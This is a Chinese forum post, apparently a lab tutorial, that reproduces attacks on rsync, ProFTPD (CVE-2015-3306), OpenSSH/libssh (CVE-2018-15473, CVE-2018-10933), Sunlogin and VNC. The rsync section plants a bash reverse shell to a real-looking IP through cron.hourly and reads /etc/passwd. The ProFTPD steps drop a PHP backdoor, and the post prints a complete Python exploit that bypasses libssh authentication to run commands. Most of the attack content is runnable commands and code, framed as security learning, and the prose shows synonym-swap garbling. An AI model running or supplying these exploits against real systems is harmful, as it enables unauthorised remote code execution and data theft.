远程访问安全:rsync、ProFTPD、OpenSSH和VNC毛病分析

打印 上一主题 下一主题

主题 968|帖子 968|积分 2904

在当今高度互联的数字时代,远程访问工具已成为企业和个人日常工作中不可或缺的一部分。然而,这些工具在带来便利的同时,也大概成为网络安全的潜伏威胁。本文将深入探讨几种常见远程访问服务和工具的安全毛病,包括rsync、ProFTPD、OpenSSH、向日葵远程控制和VNC。通过实际案例和毛病复现,我们将显现这些工具大概面临的安全风险,并提供相应的防护发起。
rsync


  • 未授权访问

    • 概念

      • rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。此中rsync协议默认监听873端口,如果目的开启了rsync服务,而且没有配置ACL或访问密码,我们将可以读写目的服务器文件。

    • 复现

      • 靶场

        • vulfocus/rsync-common:latest

      • 判断是否存在毛病rsync rsync://123.58.224.8:24947



      • 读取文件夹: rsync rsync://123.58.224.8:24947/src



      • 下载文件:rsync rsync://123.58.224.8:24947/src/etc/passwd ./



      • 上传文件:rsync -av passwd rsync://123.58.224.8:24947/src/tmp/passwd



      • 反弹shell:

        • 获取目的服务器的任务信息rsync rsync://123.58.224.8:24947/src/etc/crontab /root/cron.txt



        • 创建文件chmod +x shell
        • shell文件内容:

            1.   #!/bin/bash
            2.   /bin/bash -i >& /dev/tcp/43.139.186.80/5566 0>&1
            复制代码

        • 给予实行权限chmod +x shell
        • 上传文件rsync -av shell rsync://123.58.224.8:24947/src/etc/cron.hourly
        • nc监听,等候定时任务触发nc -lvvp 5566





    • 个别工具检测

      • 工具:

        • kali自带的msf

      • 过程

        • msfconsole
        • use auxiliary/scanner/rsync/modules_list
        • set rhost 39.103.170.93
        • set rport 873
        • run



    • 批量工具检测

      • 工具:

        • kali自带的msf
        • 本身准备好大量ip

      • 过程

        • msfconsole
        • use auxiliary/scanner/rsync/modules_list
        • set rhosts file:/home/kali/Desktop/1.txt
        • set threads 10
        • run

        • 实验连接




proftpd


  • 远程命令

    • 介绍

      • ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳固等特点。
        ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入恣意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目的。 复制命令利用ProFTPD服务的权限实行,默认环境下,该服务在“nobody”用户的权限下运行。 通过利用/ proc / self / cmdline将PHP有效负载复制到网站目录,可以实现PHP远程代码实行。

    • CVE-2015-3306复现

      • 靶场:vulfocus proftpd 远程代码实行 (CVE-2015-3306)

        • 端口对应:21:43182 80:21905

      • 工具:exploit-CVE-2015-3306-master.zip
      • 直接实行脚本即可python exploit.py --host 123.58.224.8 --port 21905 --path "/var/www/html/"



      • 访问http://123.58.224.8:21905/backdoor.php?cmd=ls成功实行命令





openssh


  • 信息泄漏

    • 介绍

      • OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。
        OpenSSH 7.7及之前版本中存在用户枚举毛病,该毛病源于程序会对有效的和无效的用户身份验证请求发出差别的相应。攻击者可通过发送特制的请求利用该毛病枚举用户名称

    • 复现

      • 靶场

        • vulfocus/ssh-passwd:latest

      • 工具:CVE-2018-15473-Exploit
      • 直接利用工具枚举即可,python sshUsernameEnumExploit.py --port 39378 --userList top_shortlist.txt 123.58.224.8


  • libssh身份绕过

    • 介绍

      • libssh是一个用于访问SSH服务的C语言开发包,它可以或许实行远程命令、文件传输,同时为远程的程序提供安全的传输通道。server-side state machine是此中的一个服务器端状态机。
        在libssh的服务器端状态机中发现了一个逻辑毛病。攻击者可以MSG_USERAUTH_SUCCESS在身份验证成功之前发送消息。这样可以绕过身份验证并访问目的SSH服务器。

    • 条件

      • libssh 0.6版本以下

    • 危害

      • libssh 0.6版本以下恣意命令实行

    • 复现

      • 靶场

        • vuifoucus libssh 身份验证绕过(CVE-2018-10933)

      • 直接利用脚本即可python38 libssh.py 123.58.224.8 61334 "ls"

          1.   #!/usr/bin/env python3
          2.   import sys
          3.   import paramiko
          4.   import socket
          5.   import logging
          6.   logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
          7.   bufsize = 2048
          8.   def execute(hostname, port, command):
          9.       sock = socket.socket()
          10.       try:
          11.           sock.connect((hostname, int(port)))
          12.           message = paramiko.message.Message()
          13.           transport = paramiko.transport.Transport(sock)
          14.           transport.start_client()
          15.           message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
          16.           transport._send_message(message)
          17.           client = transport.open_session(timeout=10)
          18.           client.exec_command(command)
          19.           # stdin = client.makefile("wb", bufsize)
          20.           stdout = client.makefile("rb", bufsize)
          21.           stderr = client.makefile_stderr("rb", bufsize)
          22.           output = stdout.read()
          23.           error = stderr.read()
          24.           stdout.close()
          25.           stderr.close()
          26.           #return output.decode()
          27.           return (output+error).decode()
          28.       except paramiko.SSHException as e:
          29.           logging.exception(e)
          30.           logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
          31.       except socket.error:
          32.           logging.debug("Unable to connect.")
          33.       return None
          34.   if __name__ == '__main__':
          35.       print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
          36.   //请使用最新版的python运行
          复制代码




向日葵


  • 远程RCE

    • 介绍

      • 向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的环境下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的利用带来许多便捷,还能为其提供各类保障。
        Sunlogin RCE 是毛病发生在接口/check处,当参数cmd的值以ping大概nslookup开头时可以构造命令实现远程命令实行利用,客户端开启客户端会自动随机开启一个大于40000的端标语。


    • 条件

      • 影响客户端版本:

        • 11.1.1
        • 10.3.0.27372
        • 11.0.0.33162


    • 靶场:


      • 着实这都不用复现因为如果真的可以成功,这不就是成钓鱼软件嘛,废物毛病直接强制更新



      • 复现就直接运行xrkRce.exe -h ip地址


VNC


  • 配置不当

    • 介绍

      • VNC(Virtual Network Computing)是一种远程桌面共享系统,它允许用户通过网络连接远程控制另一台计算机。VNC利用RFB(远程帧缓冲)协议,可以在差别的操作系统之间工作,如Windows、Mac、Linux等。它的工作原理是将远程计算机的屏幕内容传输到当地设备,同时将当地的鼠标和键盘输入发送到远程计算机。VNC通常用于远程技术支持、远程办公、教育培训等场景,具有跨平台、易用性高的特点,但也需要留意网络安全题目。在利用时,通常需要在远程计算机上运行VNC服务器,而在当地设备上运行VNC检察器来创建连接。
      • 但是利用空密码就会导致其他人直接连接上来

      • 默认端标语:5900

    • 复现

      • 靶场

        • 受害者安装sever,攻击者安装viewer即可
        • 下载链接:https://pan.baidu.com/s/1SwwfrDIbxdcq_0xKCuPoJQ?pwd=cong


      • 用nmap扫描扫主机开放5900端口



      • 实验用vnc进行连接



      • 发现可以连接成功





通过对这些常见远程访问工具毛病的分析和复现,我们可以清楚地看到,纵然是广泛利用的软件也大概存在严重的安全隐患。作为网络管理员或IT安全专业人士,我们必须时间保持警惕,定期更新和修补系统,严格管理访问权限,并采取多层次的安全措施来保护我们的网络资产。同时,对于普通用户而言,了解这些潜伏风险也很紧张,可以资助我们在利用远程访问工具时更加审慎,采取须要的安全预防措施。只有通过持续的学习、vigilance和最佳实践的实施,我们才能在享受远程访问便利的同时,有效地低落安全风险。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

罪恶克星

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表